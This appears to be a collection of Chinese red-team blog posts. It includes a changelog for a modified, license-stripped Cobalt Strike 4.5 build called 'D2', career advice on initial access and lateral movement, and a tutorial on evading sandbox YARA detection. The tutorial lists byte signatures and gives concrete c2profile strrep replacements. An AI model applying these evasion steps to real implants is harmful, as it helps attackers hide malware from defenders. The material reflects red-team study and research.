最好看的C2，没有之一

teamserver.authenticate.magic=FFAABBaggressor.authenticate.magic=EEFF22

开发日志

【注意】(20250101 - D2 v0.1) - CobaltStrike星球专版正式更名D2更新拉......

如有BUG星球提问，最好附加报错截图和使用环境。(请在JDK11下使用)

本版本基于cs4.5源码构建，使用idea+openjdk11+win10+vs2008+vs2012环境编译。

本项目主要用于学习研究，仅限合法合规项目使用，请勿用于非法项目，一切法律后果与本人无关。

本项目主要用于学习研究，仅限合法合规项目使用，请勿用于非法项目，一切法律后果与本人无关。

本项目主要用于学习研究，仅限合法合规项目使用，请勿用于非法项目，一切法律后果与本人无关。

--20250101-----

1. 修复开启sleepmask的情况下，smb和tcp不能使用bug

2. 彻底删除和msf兼容导致的checksum8问题

3. 精简过时功能，例如：browserPivot、Java Applet等

4. 完全重构UI，支持黑白模式切换，更名为D2。

5. 本地配置信息文件放入程序当前目录下，防止被预测路径读取

6. 修复文件读取函数效率低下问题

7. 404页面指纹修改

8. 自定义配置常见指纹信息

8.1 自定义配置xor key, 分为客户端配置和服务端配置，客户端配置可以通过界面修改Aggressor.prop，服务端配置需要在启动teamserver的时候写入配置文件TeamServer.prop，服务端主要是分阶段的时候使用，客户端在生成植入体的时候使用

8.2 认证指纹自定义

--20231110----

1. 修复dns beacon x86文件名错误

--20231025-----

1. 修复CVE-2022-39197漏洞在文件浏览中依旧可以触发的问题，本次修复无脑转义所有标签。

--20231023-----

1. 修复pre-urdl中在32位程序获取loader基地址问题

--20231012-----

1. 修复BOF API因顺序问题而导致的bug

2. 修复net相关命令不能使用bug

--20231011-----

1. 修复@slience 发现的spawn崩溃bug

--20230928-----

2. PROCESS_INJECT_SPAWN增加了rdl偏移参数，使得smart inject依旧正常使用

3. dllinject只能使用pre-rdl, 这个后续修改为正常dll使用。

4. post-ex完成pre-rdl改造，默认cleanup，清理所有内存，并支持自定义pre-rdl，和cs4.9的差异在自定义pre-rdl不支持browserpivot，主要是这个功能实战基本不能用，没有改的必要，c2profile中post-ex.cleanup、post-ex.transform-x64 、 post-ex.transform-x86 都没有，其中cleanup，没有必要，默认清理。transform留到下个版本。c2profile 这一块我一致想做热加载，统一修改。

5. 增加BOF函数（比4.9多加了一个函数）：

BeaconInformation(BEACON_INFO * pBeaconInfo)BeaconAddValue(const char * key, void * ptr)BeaconGetValue(const char * key)BeaconRemoveValue(const char * key)BeaconModifyValue(const char * key, void * newptr)

有了这个，其他的关于cs4.9在beacon中持久存储的功能都可以自定义实现，因此我就没有实现对应功能比如：cs4.9的beacon data store。这个功能可以基于以上函数自定义实现。4.8的存储token也类似。

6. beacon默认使用pre-rdl, 并支持自定义pre-rdl。支持cs4.9的导出无rdl的beacon, BEACON_RDLL_SIZE为0时，为使用无rdl的beacon。

7. 适配最新cs4.9 sleepmask kit，并使得每次sleep使用不同随机key

--20230914-----

1. 进程浏览增加文件路径回显

2. 针对注入行为后内存残留清理，包括自注入

--20230704（0901fix）-----

1.更新混淆中亦或算法的key

2.更新部分jdk11废弃的语法，因此请使用jdk11或更高版本

3.cs4.7：增加了BOF中.xdata .pdata .bbs区段的解析，并把动态调用函数提升到64个，并修复可能发送的数据位置和代码位置相差大于4G的情况。

4.cs4.8：升级sleepmask功能，使之能够使用cs最新套件。

5.配置信息加密方式改成多字节加密

6.修复BOF ___chkstk_ms未链接问题。

7.增加BOF Loader对__C_specific_handler支持

8.修复pivot中密钥bug

9.增加关闭jtable、jlist、jtree的html解析

10.修复.stage.transform-x64 results in a stage that's too large报错

11.修复忘记删除beacon以外的其他listener的水印验证

--20230612-----

1.cs4.6：修复了在 BOF 中调用 BeaconFormatToString 时错误地要求传递字符串长度地址的问题。

2.修复修改CheckSum8后，导致使用spawn派生到MSF6不能上线问题

3.注释掉了一些没有实际功能的测试代码，例如：TestCall

4.把黑色图标修改成白色图标，更改一些文字配色，适应暗黑主题

5.修复掉各种废弃函数，防止意外错误。

--20230607-----

1. 删除破解对抗代码和水印，把代码中所有对抗相关代码全部清楚，主要包含各种javaagent检测、完整性校验，过期校验，其中很多点很是奇葩，例如执行几个小时后才出问题，或者篡改发送的命令等等。最后把beacon中和jar包中的水印功能也去掉了，但是目前这个版本没有拿掉配置中的jar包hash。

2. 更换主题flatlaf-3.1.1.jar，并修复图标问题和背景色问题。由于老主题代码实在太老在高版本中运行太多异常，因此换成了flatlaf，这个也是网上大部分人的方案。主题使用的是模仿idea的主题，但是配色和图标上个人觉得还是有点问题，后面慢慢修复。这个版本主要修复功能为主。

3. 修复CVE-2022-39197, 这个xss漏洞修复，我没有测试，修复方式是在修复主题session图标问题的时候，直接关了JLabel的html解析。

4. 默认启用TLS1.0至TLS1.2，修复无补丁Windows7的https支持。这个网上方法。

5. 修复foreign派生错误的bug，暂时不能使用自定义反射loader

这个是直接返回的原始beacondll，我在实战中确实很少用到这个，所以按照网上的方式修复了。没有深入分析。

6. 修改默认配置信息亦或密钥，这个多加了一层亦或。如果jar包被分析，找到key，还是能解。

7. 修复CVE-2022-23317和CheckSum8, 这个修复比较是改了校验值和长度，但是如果知道值，还是能被爆破出来。所以最好不用还是关了stager。原计划之间严格，想了想夜莺C2竟然在后面版本加入了分阶段，应该就是有需求的。

8. 增加自定义编码输出，这个功能比较实用感谢@yougar0x00 指导，命令位charset xxx，妈妈再也不用担心乱码了。

9. 修改团队服务认证默认字符，常规操作，一个默认值，被加入规则也是不保险的。

10. bypass BeaconEye，就是为了改这儿导致卡了我好几天，最后发现才是这个问题，我开始是想直接改掉type值，从123 改成456,但是不知道为什么无情报错，导致beacon崩溃，我调试插件配置解析，是能够解出来的，不知道代码中可能有地方对type值的使用，导致不能修改。最后无奈还是用了网上1字节bypass的方法，但是我看了很多关于这个的文章，有部分是理解错误的，说type值是4字节只用了2字节是错误的说法，代码中type始终是short。

11. yara特征修改若干（肯定不完全），改了我以前主题中提到过的一个特征，这个特征后期不用sleepmask的情况下很难改，所以直接修改了。

本项目主要用于学习研究，仅限合法合规项目使用，请勿用于非法项目。

阅读原文

跳转微信打开

25年欢迎多私聊讨论技术问题

有好几年没有写年终总结了，当生活趋于平静，对未知不再迷茫，对当下不再纠结，对过去也不再耿耿于怀，总结似乎有点多余。我想24年没有什么好总结的，但是可以记录下24年的一些感受，随着时间流逝，感受容易被淡忘，要记录下。

10月有了一个小孩儿

其实并没有各种文学作品、影视作品中初为人父的激动，实际上挺累的，但是看着他一天一天的长大，当第一次和他咿咿呀呀的互动的时候，生命情感不知不觉已有了悸动，它不关乎血脉，是心的同频。

基本完成了一套系统

和小伙伴一起完成了一套系统，这是第一套真正意义上按照自己想法落地的系统，赶在年末基本完成。创造是一件幸福的事情，希望25年它能实现它的价值。

上班是不可能再上班了

两年的自由职业，时间并不长。勇气真的是人类最可贵的品质。在相信自己能力的同时，可能最需要的还是一丝丝的勇气。世界真的很大，被一个小小的工位锁住，有点可惜。

以诚待人，守得本心

8年的职场生活，波谲云诡的人心。待人以诚似乎有点可笑，再看《阿甘正传》，终得本心。本是无一物，何处惹尘埃。

你好，2025

我没有什么想对你说的。

阅读原文

跳转微信打开

最近又有写点什么的冲动，但是想说的很多，也很零散，只能以小节为单元，各说各话，心经、黑客与我。

心经

黑客

我

阅读原文

跳转微信打开

老牛师傅好，我想提个问题。有一些web基础和内网基础。作为一个普通的驻场安服怎么进阶到红队？没有实战项目打，很多知识点学了没多久就忘记了（公司内护网项目一般也只能打点，内网不需要我们操作）。老牛师傅一般怎么样学习？

向你提问：

老牛师傅好，我想提个问题。有一些web基础和内网基础。作为一个普通的驻场安服怎么进阶到红队？没有实战项目打，很多知识点学了没多久就忘记了（公司内护网项目一般也只能打点，内网不需要我们操作）。老牛师傅一般怎么样学习？

在攻击领域（offensive），当下大家大多自称Red Team Operator，以前是Penetration Tester。不管叫什么，offensive领域的底层学习逻辑是没有变化的：知识学习--->操练（自己搭建测试环境）--->实战，这3个环节，每个环节都需要做笔记（建议写文章并发表）。

这个过程中有新手和老手的区别，新手刚开始最好是利用系统性资料学习，可以站在前人的肩上，快速掌握知识。老手需要跟进前沿技术成果和开始技术拓展的研究。说回攻击领域的学习无外乎两块儿：打点、内网。

在星球有用户提过这样一个问题：匿名用户 提问：

师傅，现在攻防比较多，一个客户一年可能要做好几次攻防，以前的漏洞都打没了，请问在前期信息收集时，除了子域名 c段 子公司 公众号之外还有哪些思路可以收集到更多的信息，寻找到更多的突破口？我刚打攻防，现在也只会爆破子域名 扫c段 用一些软件查一下子公司，一旦这些方式获取不到有效信息，我就有点不知所措了

我的回答：

从你的问题中，我想应该拆分为2个问题，1个是除了漏洞还有其他打点方式么？2个是信息收集的方式除了子域名、C段、子公司还有其它的么？先说第一个问题：我大致把打点分为以下5种方式：

1. 互联网可利用漏洞（T1190）

2. 钓鱼(T1192、T1193、T1194)

3. 滥用认证机制(T113、T1078)

4. 供应链攻击（T1195、T1199）

5. 近源攻击（T1200、T1091）

具体描述可以根据后面编号在ATT&&CK框架网站中查询。使用这5种方式之前都涉及到信息收集。就是第二个问题，关于信息收集的方式上。上面的5种打点方式需要收集的信息侧重点不同

1. 漏洞：主要是目标网络边界资产测绘IP、端口、域名、应用以及详细指纹，这的应用是一个泛指，例如：常见的web、WEB容器、中间件、设备、协议等等，一切暴露在边界的。这些方式不稀奇，现在拼的已经不是方式的多少，而是数据大小、指纹深度、扫描周期等公司级投入了。

2. 钓鱼：钓鱼主要针对的是人，因此人员的信息收集渠道和能力就非常重要的，这块儿信息主要分为：身份信息（姓名、性别、年龄、职位等）、交流方式（手机、邮件、即时通讯等）、兴趣爱好（各种社交平台）。当然收集方式就涉及到各种小技巧，需要个人尝试整理，因为涉及到的各种平台的机制在不停变化。

3. 认证：认证是网络的门锁，账号密码是钥匙，先通过测绘找到各种锁，例如：web登录、VPN、各种服务协议的认证入口等等。然后就是了解这些认证所需要的钥匙样式，有账号密码、有的只需要密钥、有的可能天生未授权，有的可能固定密钥或密码。根据密码的策略，账号的样式，然后通过信息收集涉及目标的各种关键字、以及常见密码设置的规则，来生成密码。其实很多设备类资产，特别是复杂架构类设备，例如会议系统，涉及到多个组件功能，内置了很多默认密码。实在不行咸鱼买账号登录内网也不是没发生过。

4. 供应链：供应链有上游下游，有物理网络上的供应链关系、也有业务逻辑上的供应链关系。这些信息收集例如：常见的企查查、招投标、财报、新闻等等 。

5. 近源：这里主要收集目标办公点、机房、安保信息，以及涉及到的wifi、门禁、自助设备等，主要根据场地实际情况突破安保和监控找到网络接入点。

以上是关于打点，再说到内网渗透，有人说渗透的本质是信息收集，这个说法个人觉得比较片面，我还是比较喜欢@Jackson_T用OODA循环来阐述渗透的过程。OODA是一个军事理论，Observe观察、Orient定位、Decide决策、Action行动。有兴趣的同学可以自己搜索学习下。说回内网，我个人认为内网的知识大致分为：

1. 系统设备操作：你要学会各种系统（windows、linux、交换机OS、路由器OS等等）的各种命令操作。

2. 网络架构理解：内网内网，庞大的网络结构，你需要理解网络结构，定位自身所处位置，找到目标位置。

3. 权限提升：一步一步把自身权限提升到管理人员层级，你需要权限才能走到你目标的位置。

4. 横向移动：找到你自身到目标的路径，通过不管是RPC协议，还是运维工具，打通这条路径。

5. 影响评估：找到目标如何获取目标。1T的数据如何出来？

以上只是一个笼统的分类，其中每个分类所涉及的知识都是海量的。在内网渗透中还有一个三通道的理论：命令通道、潜伏通道、数据通道。一切的技术围绕着这3个通道的创建，在内网中如果你不能建立起这3种通道，你的任务就很难完成和抵御风险，这个不多说。

在学习了知识过后，操练是必不可少的，我建议自己搭建测试环境，这样能让你对系统设备的操作有深入理解。纸上得来的不一定完全正确，信息的传递也存在失效和误差，操练是一个纠偏的过程。

最后就是实战，实战是检验一切技术的标准，不管是刷SRC还是H1，亦或是HW项目还是渗透测试项目，也可以把眼光看向外边的世界。我个人对目前行业里的技术人员分为3种：只学习了知识的嘴炮选手，通过了操练的实验室黑客，以及正在实战的一线人员。当然这是从纯技术角度出发的视角，并不包含工作属性。

除了以上，还有2点我没说到：

一点是防御对抗，不实战时仅仅学习和操练是不会遇到防御对抗的，不管是WAF、还是内网的流量对抗、终端对抗。对抗是一个此消彼长的过程，不停地在演进。不管是在打点还是在内网，都涉及到对抗，所以对抗我一般单独拿出来看。做个比喻就好比知识的学习和操练就是你在靶场实弹打靶，靶是没有防弹衣的，靶也是不会反击的，而实战中目标是有防弹衣或者也会反击你的。突破防御和做好自身防御，使自己操作根据实际环境做OPSEC，这些都是所谓的经验和感觉，是需要实战才能练出来的。因此当操练过后，学习一些前沿的对抗技术，然后在实战中不断打磨。对抗技术的时效性很强，需要技术人员在实战中不停摸索，这可能也是实战中别人搞不定你搞得定的关键。同样也是很多老手不愿意给新手分享的核心技术。被防御方知晓就会失效。

二点是笔记！笔记！还TM是笔记。没有人能记住所有，随时做好笔记，定期做梳理，时不时写成文章，是非常有必要的。这个过程比较枯燥，把笔记写成文章发表，是一个不错的抵御枯燥的方法。比较值得学习的是我遇到一个同学，在向我提问的时候，把自己的问题写成了一个文档给我，我看完就很快找到了他问题所在，这样非常的高效。可能你会觉得写文档浪费时间，其实写文档的过程就是梳理你问题的过程，可能你在梳理的过程中你自己都找到了问题的原因。

以上是技术学习，而技术工作学习，可能和以上思路有很多不一样的地方。技术学习可以让你在技术领域比较突出，但并不一定让你在工作中突出。

技术工作学习要注意2个问题：技术适配和技术溢出。岗位JD、实际工作内容、实际工作目标这3者往往并不是一致的，而你的技术能不能让你完成你的工作目标，或者你技术学习的方向是不是在跟着你的工作目标而变化。当然完成工作目标，技术只是其中一部分，打XX打的也是人情世故。因此你的技术工作学习是跟你的实际工作目标相关的，和纯技术学习是不一样的。所以你必须做好技术适配。举个例子：如果工作需要的是嘴炮，你学习学习知识就行了，更多的专研向上管理可能会让你在工作中混的更好。如果你想混甲方，多写写操练文章，扩大扩大影响力，混点会议，做做社交，不需要实战，不注意可能你就是负责人了。当然我这里并不是嘲讽，因为岗位的需求是不一样的，摸清楚真实的职责和价值，才是技术工作学习的正确方向。至于技术溢出，目前很多岗位其实不需要太深入的技术，很多核心的赚钱部门，同样并不需要所谓的高深技术，也就是赚钱的技术并不一定高深，高深的技术并不一定赚钱。

技术工作学习的话题很大，涉及技术人员的职业发展，今天就说到这儿了，后续有机会再聊。也欢迎加入星球向我提问，不管是攻击领域（offensive）的技术问题，还是工作求职问题。下面是3天体验卡。

阅读原文

跳转微信打开

今天看见了 CobaltStrike 博客最新一篇文章，于是有了一些闲言碎语。

0x00 历史闲话

0x01 技术碎语

怎么说呢，嘴上说的听 Raphael Mudge 的话，把开发重点放在 Stability（稳定性）和 Flexibility（灵活性），实际上从4.5到4.8，灵活性上虽有增强，例如：在sleepmask和UDRL上都有改造和完善，把反射DLL的1M大小限制也增加了，但稳定性明显下降，在4.6中写bug，在4.7中修bug，4.8还搞些非必要功能（就是可以通过扩展实现的功能，非要集成到框架中），例如：增加系统调用。看看别人 mdsec 的 nighthawk ，积极解决 fork&run 问题和提升 bof 等 beacon 内扩展执行的稳定性，最后还增加了实战性超强的 HVNC 功能。

当然这2个 UDRL 用到的技术，都是公开的技术：

后面的投递物的定制自动化生成，真的是看见自己一直想实现的东西，被工程化的这么好，略有遗憾的心情中还是很激动的：

后面的信息视频中就打码了。稍微瞟到部分东西，感觉是一些对抗技术细节。总的来说 Outflank 的东西做的很实战，我很喜欢。

0x02 干啥啥不行，防”盗“第一名

这个竟然加入到了”The Road Ahead“中，我只能说：CobaltStrike v4.5 是最后的C2。（ps：有没有哪天出个国产替代，哈哈哈！）

0x03 总结

阅读原文

跳转微信打开

这几天有好多小伙伴使用了星球版的cobaltstrike 4.5。昨天有个小伙伴遇到一个奇怪问题，不用他自定义的c2profile，微步云沙箱一个yara都没匹配到，但是使用了它自定义的c2profile，被沙箱的yara疯狂匹配。

0x00 前言

这几天有好多小伙伴使用了星球版的cobaltstrike 4.5。昨天有个小伙伴遇到一个奇怪问题，不用他自定义的c2profile，微步云沙箱一个yara都没匹配到，但是使用了他自定义的c2profile，被沙箱的yara疯狂匹配。

• 默认生成：https://s.threatbook.com/report/file/76e6e86b5850229c8bdc5e2b1e617240dc885c606c9ebc82c1f8fbfb87c57325

• 自定义profile：https://s.threatbook.com/report/file/0ec7e263d3b540d1c71042a7ae6111b5ea2f641c0d7c08426f5f4f361f105af1

这个我也不知道为什么，按理说我没有过多针对yara规则做bypass，只把几个不好用c2profile篡改的点给patch掉了，剩余的地方应该很容易会被yara规则扫描到。（这里主要是stageless的exe，静态扫描）。

我为什么没有直接patch掉所有yara规则呢？我是不可能patch完的，yara有开源的规则，有闭源的规则，太多了，授人以鱼不如授人以渔，掌握了方法，自己在实际目标中，针对特定防御软件自行patch才是可取之道。

这种静态的规则检测，对抗其实很简单。这段时间有2篇不错的文章可以参考：

《Unleashing The Unseen: Harnessing The Power Of Cobalt Strike Profiles For EDR Evasion》

https://whiteknightlabs.com/2023/05/23/unleashing-the-unseen-harnessing-the-power-of-cobalt-strike-profiles-for-edr-evasion/

《Cobalt Strike and YARA: Can I Have Your Signature?》

https://www.cobaltstrike.com/blog/cobalt-strike-and-yara-can-i-have-your-signature/

我这儿拾人牙慧，使用微步云沙箱做做测试，微步云沙箱是国内使用最广泛的沙箱，非常优秀，本文测试不代表任何观点。

0x01 使用transform-x64替换特征码

我使用https://www.red-team.cn/index.php?tools随机生成一个c2profile。并生成一个stageless的exe上传微步云沙箱

https://s.threatbook.com/report/file/28681c38b237a86bf584a503bbc9117b35c39e097ac9949001121b63adc4d0e0

被疯狂扫出来了，点击查看匹配项特征如下：

050405040507050d05070504050704be0506050705010505378605010507050105106ff90500050405070537
%02d/%02d/%02d %02d:%02d:%02d
%s as %s\%s: %d
48895c240848896c24104889742418574883ec204c8b5108418bf0488bea488bd9458b0a458b5a044d8d52084585c9
4d5a4152554889e54881ec20000000488d1d
e9d3fdffffeb0ab801000000e9ad030000
3bc7750dff15ee8f01003d33270000
4183c9ff33d2ff1525e101004c63c04983f8ff
488d4d97e8f8cbffff4c8d9c24d0000000418bc7498b5b20498b7328498b7b30
488b4c24208b04018b4c240833c88bc189442408
49c1e002e821e4000003f34d8d349e3bf57d13
752c4c8d45af488d55af488d4d27
bd0800000085d27459ffcf4d85ed
4c8b5308458b0a458b5a044d8d52084585c975054585db7433453bcb73e6498bf94c8b03

其中有字符，有指令，字符一般都是print之类函数中的，删除肯定是不行的，所以替换下其中无关紧要的字符就行了：

strrep "%02d/%02d/%02d %02d:%02d:%02d" "%02d-%02d-%02d %02d:%02d:%02d";
strrep "%s as %s\\%s: %d" "%s - %s\\%s: %d";

剩余的指令就是反射loader的头，默认的sleepmask。直接用https://defuse.ca/online-x86-assembler.htm 网站，把特征码转成指令，举1个例子：

这个是默认的sleepmask，然后复制下面的指令，把一些和顺序无关的mov指令调换下顺序：

mov    QWORD PTR [rsp+0x10],rbp
mov    QWORD PTR [rsp+0x8],rbx
mov    QWORD PTR [rsp+0x18],rsi
push   rdi
sub    rsp,0x20
mov    r10,QWORD PTR [rcx+0x8]
mov    rbp,rdx
mov    esi,r8d
mov    rbx,rcx
mov    r11d,DWORD PTR [r10+0x4]
mov    r9d,DWORD PTR [r10]
lea    r10,[r10+0x8]
test   r9d,r9d

然后再用上边的网站转换成16进制：

最后修改c2profile替换下就OK了。

strrep                  "\x4D\x5A\x41\x52\x55\x48\x89\xE5\x48\x81\xEC\x20\x00\x00\x00\x48\x8D\x1D\xEA\xFF\xFF\xFF\x48\x89\xDF\x48\x81\xC3\xA4\x6E\x01\x00\xFF\xD3\x41\xB8\xF0\xB5\xA2\x56\x68\x04\x00\x00\x00\x5A\x48\x89\xF9\xFF\xD0" "\x4D\x5A\x48\x8D\x1D\xF8\xFF\xFF\xFF\x41\x52\x48\x83\xEC\x28\x48\x89\xDF\x48\x81\xC3\x52\xB7\x00\x00\x48\x81\xC3\x52\xB7\x00\x00\xFF\xD3\x48\xC7\xC2\x04\x00\x00\x00\x48\x89\xF9\xFF\xD0";
  
strrep "\x48\x89\x5C\x24\x08\x48\x89\x6C\x24\x10\x48\x89\x74\x24\x18\x57\x48\x83\xEC\x20\x4C\x8B\x51\x08\x41\x8B\xF0\x48\x8B\xEA\x48\x8B\xD9\x45\x8B\x0A\x45\x8B\x5A\x04\x4D\x8D\x52\x08\x45\x85\xC9" "\x48\x89\x6C\x24\x10\x48\x89\x5C\x24\x08\x48\x89\x74\x24\x18\x57\x48\x83\xEC\x20\x4C\x8B\x51\x08\x48\x89\xD5\x44\x89\xC6\x48\x89\xCB\x45\x8B\x5A\x04\x45\x8B\x0A\x4D\x8D\x52\x08\x45\x85\xC9";

微步云沙箱yara就扫不出来了：https://s.threatbook.com/report/file/db7f83d07fb51933d97763ac99ff252e66c6282ffcb4e4ba955fe8c570f35177

但是其中还有一个命名管道被检测到，这个是artifact kit中的，自己编译一个新的artifactkit就OK了。在bypass-pipe.c中：

这仅仅是过了一些规则的检测，但是依旧有一半的引擎被检测出，很多商业规则，比较难以测试，因此作为一个红队选手，编写一些自己的独自使用的loader很有必要，本文不具体阐述如何写loader，但是分析下cobaltstrike的植入体结构，有利于大家做对抗。

0x02 CobaltStrike植入体结构分析

其实我们生成的stageless文件包含4部分（按对抗点分）：artifact、rdll loader、beacon、sleepmask。对应到cobaltstrike中的功能：

artifact -> artifact kit
rdll loader -> UDRL kit
beacon -> resource或sleeve目录下的beacon.xx.dll
sleepmask -> sleepmask kit

这是当前的CS的植入体结构，这个结构不是一蹴而就的，最开始只有artifact和beacon(包含rdll loader、sleepmask功能)，artifact其实就是一个loader，你可以在其中加入各种对抗手法。慢慢的随着对抗升级，UDRL和sleepmask代码被从beacon中拆分了出来，让用户可以以BOF的形式自定义。

目前的执行流程就变成了如下图：

1. artifact加载beacon.dll，beacon.dll被加载后触发DLL_PROCESS_ATTACH，执行配置解密并放入堆上（ps:这也是beaconeye检测原理）。然后执行导出函数ReflectiveLoader。

2. rdll loader执行一系列的pe操作，把beacon在内存中安置好，然后执行清理，把自己清理掉。

3. 把执行权给到beacon。

4. beacon就开始组装metadata回连，然后根据sleep时间执行sleepmask加密堆和beacon。

5. sleep时间到就解密beacon和堆，执行beacon中代码，执行完成又回到sleepmask。

6. 4-5这个循环中，sleepmask的代码一直在内存中裸露的。（这个也是为什么当下内存查杀对抗点到了sleepmask上）

0x03 总结

本文是因一个小伙伴私聊微步云沙箱的yara检测而起，第一部分简单对抗了一下已有yara规则，步骤比较详细，适合新手小伙伴，但是好的做法还是自定义，在知己知彼的情况下自定义，适合有一定基础的小伙伴，于是引入第二部分，cs植入体可能被提取yara规则的地方，其中beacon目前代码没有公开，无法自定义，其他部分均可以自定义。当前情况下，基本把暴露的点都留给了使用者自定义了，因此CS在不同人手动，可能威力就不同了，同时对使用者的要求也提高了很多。

目前星球版的4.5在sleepmask这块功能要弱于4.8，后续会改进到4.8类似的功能。星球也有4.8和最新的配套kit，可以直接使用。

阅读原文

跳转微信打开

记录一下在做技术之余脑袋里面的一些清奇的脑回路。一些胡言乱语的思考，看官们且看过笑过就行，不必深究。3月离职

阅读原文

跳转微信打开

做安全的同学应该都有一个痛点（可能计算机技术相关的同学也有类似痛点）：最新的知识绝大多数是英文的，吸收很慢，国内的翻译或解读文档质量太低，这里的质量不是说深浅，而是对错，很多入门的小伙伴应该都有一个经历就是把错误的理解学了很久才发现是错的。

• 【免费】沉浸式双语网页翻译：https://github.com/immersive-translate/immersive-translate/

• 【￥89/永久】Typora：https://typora.io

• 【$5起/按量计费】OpenAI API：https://openai.com

• 【免费】PicGo：https://github.com/Molunerfinn/PicGo
  

• 【需购买】腾讯云COS：https://cloud.tencent.com/product/cos
  

• 【充值】nobepay：https://www.nobepay.com

当然一切的前提是你能够科学的上网。首先我们肯定是要购买OpenAI API的Key，免费的基本不能用，太慢了。购买需要信用卡，因此我们要用到nobepay，这个网站需要实名注册，这个注册我就不写了，怕公众号发不出去，这个链接有教程：https://juejin.cn/post/7214635327406293051，我开的卡是489683号段的。

然后到https://platform.openai.com/account/billing/payment-methods填上信用卡信息，会马上冻结$5，因此你卡上最好有$6以上，因为还有手续费之类的。

然后你就有Key了https://platform.openai.com/account/api-keys，生成一个：

然后设置中填上key，模型选择gpt-3.5-turbo,大部分人应该只有这个，用不了GPT4，运气好的小伙伴申请到了GPT4 API试用可以选GPT4.

然后打开一个技术博客看后看看效果：

双语阅读，毕竟技术文章，即使是GPT也可能有一些不准确的地方，但是比google翻译、DeepL好太多。发现拗口的地方可以对照原文，随便学习英文。这极大的提升了我的阅读效率。

那为什么需要typora呢？好的技术文章不是一遍就能吃透的，有些比较深入的技术文章，需要很多前置知识，你必须阅读完或学习完一些前置知识才能看懂，不然看了也是白看。所以好文章需要存储，一定不要相信它发表在网上就一直在网上，很多好文章过一段时间就没了。保存为PDF落在你的硬盘上才是稳当的。

typora具有非常牛逼的格式转换能力，你只需要粘贴复制，我试过很多工具，在复制后格式都会乱，但typora很牛逼。看效果（无任何改动）：

其中图片是重点，typora自动上传图片到我的腾讯云COS了

这个配置在typora偏好设置中：

这里就用到了picgo。picgo的图床我用的腾讯云的COS，你也可以选用其他的：

最后记得用typora导出文档为pdf，这才是最稳当的。

有个一个微信群，人近300了，可以找我和认识的且在群里的朋友拉。满了我再建2群。

阅读原文

跳转微信打开

现在是0:18，躺在床上毫无睡意，突然想写写公众号。离职在家快3个月了。可能有的小伙伴会好奇，你21年不就说

阅读原文

跳转微信打开